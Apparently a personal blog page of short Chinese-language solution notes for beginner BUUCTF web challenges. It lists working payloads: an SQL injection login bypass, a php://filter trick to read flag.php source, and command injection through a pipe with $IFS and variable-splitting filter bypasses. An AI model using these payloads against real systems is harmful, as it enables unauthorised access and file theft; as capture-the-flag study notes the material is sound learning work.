image frame

你好,陌生人

BUUCTF

CTF

[极客大挑战 2019]EasySQL

1
2
用户名:1' or 1=1 #
密 码: 1' or 1=1 #

[极客大挑战 2019]Havefun

1
2
3
4
5
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';  
# 用get的方式cat=dog

[ACTF2020 新生赛]Include

1
2
3
4
5
6
7
8
php伪协议主要用来读取文件
?file=php://filter/convert.base64-encode/resource=flag.php
     └──┬─────────┘ └─────────┬────────┘ └─────┬──────┘
       协议头             过滤器               资源路径
为什么要有base64转码?
flag.php当成一个文件去执行而不是返回文件源码
如果没有转码,直接读取php文件(当作脚本执行)不返回源码 
使用convert.base64-encode的前提是,读取的文件是脚本,反之txt、config无需,但这样有点多余了(直接在url后拼接文件名)

[ACTF2020 新生赛]Exec

1
2
target=127.0.0.1|cat+/f*
请求URL从服务器的文件系统中检索任意文件

[GXYCTF2019]Ping Ping Ping

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
相对于上个命令执行添加的过滤条件
┌──(root㉿kali)-[~/桌面]
└─# ls | a=41154;cat $a.sh   #关键字绕过                                                                   
┌──(root㉿kali)-[~/桌面]
└─# echo $IFS$9              #空格绕过

GET /?ip=127.0.0.1|ls HTTP/1.1 /?ip=
	flag.php
	index.php
GET /?ip=127.0.0.1|cat$IFS$9index.php HTTP/1.1
	可以看到过滤规则,
/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
	flag
管道符右面是可以执行的命令,赋值不行,;允许变量赋值/?ip=127.0.0.1|a=g;cat$IFS$9fla$a.php
马勒戈壁的,最后的flag在前端里
  • Copyrights © 2018-2025 琳烦雨
  • Visitors: | Views: